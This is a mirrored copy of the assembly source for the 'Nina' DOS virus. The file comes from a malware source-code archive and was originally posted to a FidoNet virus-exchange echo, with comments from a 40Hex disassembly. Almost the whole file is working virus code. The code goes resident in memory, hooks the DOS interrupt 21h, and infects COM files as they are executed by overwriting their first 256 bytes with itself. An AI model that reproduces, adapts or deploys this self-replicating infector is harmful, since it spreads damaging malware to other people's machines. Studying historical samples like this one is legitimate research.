mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
4b9382ddbc
push
188 lines
7.1 KiB
NASM
188 lines
7.1 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 35 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : NINA.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37)
|
||
;* To : Viral Doctor
|
||
;* Subj : NINA.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
|
||
.model tiny
|
||
.code
|
||
org 100h
|
||
; Disassembly done by Dark Angel of Phalcon/Skism
|
||
; for 40Hex Number 9, Volume 2 Issue 5
|
||
start:
|
||
push ax
|
||
mov ax,9753h ; installation check
|
||
int 21h
|
||
mov ax,ds
|
||
dec ax
|
||
mov ds,ax ; ds->program MCB
|
||
mov ax,ds:[3] ; get size word
|
||
push bx
|
||
push es
|
||
sub ax,40h ; reserve 40h paragraphs
|
||
mov bx,ax
|
||
mov ah,4Ah ; Shrink memory allocation
|
||
int 21h
|
||
|
||
mov ah,48h ; Allocate 3Fh paragraphs
|
||
mov bx,3Fh ; for the virus
|
||
int 21h
|
||
|
||
mov es,ax ; copy virus to high
|
||
xor di,di ; memory
|
||
mov si,offset start + 10h ; start at MCB:110h
|
||
mov cx,100h ; (same as PSP:100h)
|
||
rep movsb
|
||
sub ax,10h ; adjust offset as if it
|
||
push ax ; originated at 100h
|
||
mov ax,offset highentry
|
||
push ax
|
||
retf
|
||
|
||
endfile dw 100h ; size of infected COM file
|
||
|
||
highentry:
|
||
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
|
||
; memory isn't freed when the
|
||
; program terminates
|
||
mov ax,3521h ; get int 21h vector
|
||
int 21h
|
||
|
||
mov word ptr cs:oldint21,bx ; save it
|
||
mov word ptr cs:oldint21+2,es
|
||
push es
|
||
pop ds
|
||
mov dx,bx
|
||
mov ax,2591h ; redirect int 91h to int 21h
|
||
int 21h
|
||
|
||
push cs
|
||
pop ds
|
||
mov dx,offset int21
|
||
mov al,21h ; set int 21h to virus vector
|
||
int 21h
|
||
|
||
pop ds ; ds->original program PSP
|
||
pop bx
|
||
push ds
|
||
pop es
|
||
return_COM:
|
||
mov di,100h ; restore original
|
||
mov si,endfile ; file
|
||
add si,di ; adjust for COM starting
|
||
mov cx,100h ; offset
|
||
rep movsb
|
||
pop ax
|
||
push ds ; jmp back to original
|
||
mov bp,100h ; file (PSP:100)
|
||
push bp
|
||
retf
|
||
exit_install:
|
||
pop ax ; pop CS:IP and flags in
|
||
pop ax ; order to balance the
|
||
pop ax ; stack and then exit the
|
||
jmp short return_COM ; infected COM file
|
||
int21:
|
||
cmp ax,9753h ; installation check?
|
||
je exit_install
|
||
cmp ax,4B00h ; execute?
|
||
jne exitint21 ; nope, quit
|
||
push ax ; save registers
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push ds
|
||
call infect
|
||
pop ds ; restore registers
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
exitint21:
|
||
db 0eah ; jmp far ptr
|
||
oldint21 dd ?
|
||
|
||
infect:
|
||
mov ax,3D02h ; open file read/write
|
||
int 91h
|
||
jc exit_infect
|
||
mov bx,ax
|
||
mov cx,100h
|
||
push cs
|
||
pop ds
|
||
mov ah,3Fh ; Read first 100h bytes
|
||
mov dx,offset endvirus
|
||
int 91h
|
||
mov ax,word ptr endvirus
|
||
cmp ax,'MZ' ; exit if EXE
|
||
je close_exit_infect
|
||
cmp ax,'ZM' ; exit if EXE
|
||
je close_exit_infect
|
||
cmp word ptr endvirus+2,9753h ; exit if already
|
||
je close_exit_infect ; infected
|
||
mov al,2 ; go to end of file
|
||
call move_file_pointer
|
||
cmp ax,0FEB0h ; exit if too large
|
||
ja close_exit_infect
|
||
cmp ax,1F4h ; or too small for
|
||
jb close_exit_infect ; infection
|
||
mov endfile,ax ; save file size
|
||
call write
|
||
mov al,0 ; go to start of file
|
||
call move_file_pointer
|
||
mov dx,100h ; write virus
|
||
call write
|
||
close_exit_infect:
|
||
mov ah,3Eh ; Close file
|
||
int 91h
|
||
exit_infect:
|
||
retn
|
||
|
||
move_file_pointer:
|
||
push dx
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ah,42h
|
||
int 91h
|
||
pop dx
|
||
retn
|
||
|
||
write:
|
||
mov ah,40h
|
||
mov cx,100h
|
||
int 91h
|
||
retn
|
||
|
||
db 'Nina'
|
||
endvirus:
|
||
int 20h ; original COM file
|
||
|
||
end start
|
||
|
||
;-+- Terminate 1.50/Pro
|
||
; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/yx Extended memory swapping
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|